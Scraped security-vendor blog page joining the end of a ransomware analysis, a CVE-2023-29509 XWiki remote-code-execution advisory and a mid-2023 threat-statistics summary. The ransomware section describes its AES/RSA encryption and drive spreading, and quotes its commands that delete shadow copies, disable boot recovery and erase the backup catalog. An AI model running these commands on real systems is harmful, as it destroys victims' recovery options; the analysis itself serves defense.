It has a hardcoded list of directories and files with valid extension in those directories are only encrypted.

List of the extension

Before encrypting the file it checks for the list of valid file extensions and the filename should not be one in the droppedMessageTextbox supplied at the time of building the ransomware.

This droppedMessageTextbox contains the name of the file which contains the ransomware message.
In our case the filename is “read_it.txt”;

Before encrypting the file it checks for the File length.
If the file length is below 2,117,152 bytes, it encrypts the file using EncryptFile method and if the size is bigger than
2,117,152 bytes a random string of a random length between 200000000 and 300000000 bytes is generated and encoded using the randomEncode method.

It creates a 20 byte random password and converts the password to a byte array using UTF8 encoding.
The content of the file is then AES encrypted using that key.
It then encrypts the key generated earlier using the RSA encryption

AES encrypted content are again converted into Base64 encoding.

It then concat the RSAEncrypted key and base64 encoded content into the file using File.WriteAllText method.

Finally, original file is moved to same location by appending a random extension using the RandomStringForExtension method.
It then drops the “read_it.txt” containing the ransomware message on that location.

Once the encryption is done it delete Shadow Copies, disable Recovery Mode and delete Backup Catalog file using below commands.

“vssadmin delete shadows /all /quiet & wmic shadowcopy delete”
“bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no”
“wbadmin delete catalog -quiet”

In order or spread, it loops through all the available drives on the system and if the drive is not a C:\ drive and the spreadName file is not present on the system, It copies the malware’s file to that drive with the specified spreadName.

This way the malware can potentially infect other machines whose drives are mapped onto the victim’s machine.

Once the encryption is completed it displays the ransomware message text.

It set the below wallpaper

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV:MalAgent.RSM_99 (Ransomware)

XWiki RCE Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  XWiki is recognized as a second-generation wiki platform, bringing together the conventional wiki functionality and the unique potential of an application development platform. It showcases a broad array of features typical of a wiki, such as advanced access rights and effective user management. Additionally, XWiki’s defining trait lies in its capacity to allow the creation of new applications, which can be developed directly on top of the platform.

  Recently, a significant issue has emerged pertaining to XWiki, specifically a reported vulnerability that allows remote code execution. This vulnerability stems from improper handling of documentTree macro parameters within the system. The improper escaping of these parameters creates a security gap, making the platform susceptible to external threats.

  The security flaw opens up an opportunity for remote attackers to exploit this vulnerability. They can do so by sending specially crafted requests to the target server, where XWiki is being hosted. Should the attack be successful, the exploiter would gain the ability to execute code remotely.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-29509.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  XWiki boasts a powerful scripting feature set, allowing users to create everything from simple to intricate web applications on an XWiki page (or view) layer. There is no need for users to compile code or deploy software components – instead, they can utilize scripting syntax alongside wiki markup directly within the content of an XWiki page.

  The platform supports a range of scripting languages, including Velocity, Groovy, and Python, all of which are enabled by default. XWiki incorporates the JSR-223 scripting platform, which facilitates the evaluation of script code. Additionally, XWiki utilizes a script macro that assesses script code and is structured as follows:

  

  To declare script code for default enabled languages, users can directly use the language name:

  

  The standard XWiki flavor includes the “Flamingo Theme Application” extension. This allows users to customize site skins, and the extension has a macro “FlamingoThemesCode.WebHome”. This macro lists the sub-documents of any given document. When a page request is made with the GET parameter sheet set to “FlamingoThemesCode.WebHome”, the same macro is used to render the page. The parameter document:$doc.documentReference is set to the current page, and this value is passed to the documentTree macro, which in turn lists the sub-documents of the present page.

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The target user must have network connectivity to the affected ports.

Triggering Conditions:

  The attacker requests a malicious page using the FlamingoThemesCode.WebHome view. The vulnerability is triggered when the server processes the requests.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

  Get Request:
  
  URL Decoded:
  

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 2062 XWiki Commons documentTree Remote Code Execution 1
  • IPS: 18914 XWiki Commons documentTree Remote Code Execution 2

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Updating to a non-vulnerable version of the product.
    • Filtering attack traffic using the signatures above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

First-Half 2023 Threat Intelligence: Tracking Cybercriminals Into the Shadows

Over the past five years, cybercriminal groups have become increasingly corporatized. The early 2020s even saw them starting to market themselves as they endeavored to become widely known — both to be taken more seriously and to build a reputation for “fair” dealings with their victims. Lesser-known groups were even known to borrow the branding of larger groups, hoping to cash in on the brand recognition surrounding them.

But while the paychecks kept pouring in, cybercriminal groups seemed to lose sight of one thing: they weren’t legal entities in the way the corporations they emulated were. In fact, there was nothing legal about them at all, as many were reminded when politicians and law enforcement ramped up enforcement efforts and they found the long arm of the law pointed squarely in their direction.

After every cybercriminal arrest, the same refrain is repeated: “We applaud the efforts of law enforcement, but we don’t expect the bust to bring about lasting change.” But a look at data from the first half of 2023, as reported in the just-released Mid-Year Update to the 2023 SonicWall Cyber Threat Report brings this accepted notion into question, as we’ve seen threat actors begin to shun the spotlight and focus more on lower-risk activities such as cryptojacking, IoT malware and encrypted threats.

A graph depicting the rise of cryptojacking hits in 2023.

Malware Continues its Migration

Malware remained essentially flat year-to-date, falling just two percent compared with the first half of 2022. But that doesn’t mean there isn’t a great deal of change going on below the surface. With 1.3 billion hits (out of a global total of 2.7 billion), North America still sees the lion’s share of malware, but it was also the only region to record a decrease. In contrast, Europe and LATAM saw double-digit growth, suggesting that cybercriminals are shifting their attention to new shores.

Customers working in education and finance saw particularly large increases in malware, though none of the industries we examined showed a decrease.

Ransomware is Down, but Poised for a Turnaround

If cybercriminals are showing a greater interest in remaining under the radar, then a decrease in ransomware — a form of cybercrime that relies on the threat actors announcing and introducing themselves — should be expected. Still, with attack volumes down 41% over the first six months of 2022, many might wonder whether cybercriminals are giving up on ransomware for good.

There are a number of reasons we don’t think so, one of which is the trend line for ransomware as we moved through 2023. While the year-to-year trend line still points downward, on a month-by-month basis, we’ve actually seen ransomware rise, with a second quarter 74% higher than the first.

Cryptojacking’s Record Surge Continues

But if ransomware is down, what’s rising to take its place? We’ve seen an increase in several attack types, but perhaps the most pronounced has been in cryptojacking.  The number of cryptojacking hits reached 332 million hits in the first half of 2023, up a staggering 399% year-to-date. This not only represents a new record high — it also puts 2023 on track to see more cryptojacking hits than all other years on record combined.

IoT Malware Jumps by More Than a Third

SonicWall Capture Labs threat researchers noted a continued increase in the amount of IoT malware in the first half of 2023, jumping 37% to 77.9 million. At this rate, the number of IoT malware attacks will easily eclipse last year’s total, itself a record high.

As we’ve seen with other threat types, North America saw a decrease in attacks. At a modest 3%, however, this dip was more than made up for by triple-digit jumps in Asia and Latin America. India, in particular, saw an outsized number of these attacks: IoT malware there skyrocketed 311%.

Malicious PDF and Office Files Fall by Double Digits

The number of attacks involving malicious PDFs dropped 10% in the first six months of 2023, but there was an even bigger decrease in the use of malicious Microsoft Office files: Those attacks fell a staggering 75% compared with the same time period in 2022. Some of this drop may be due to Microsoft’s recent efforts to increase security, but time will tell whether this is a sustained downturn or whether cybercriminals make inroads around these new restrictions.

“The seemingly endless digital assault on the enterprise, governments and global citizens is intensifying and the threat landscape continues to expand,” said SonicWall President and CEO Bob VanKirk. “Threat actors are relentless, and as our data indicates, more opportunistic than ever before, targeting schools, federal governments and retail organizations at unprecedented rates. The 2023 SonicWall Mid-Year Cyber Threat Report helps us understand both the criminal mindset and behavior, which will in turn help organizations protect themselves and build stronger defenses against malicious activities.”

Read the full report here.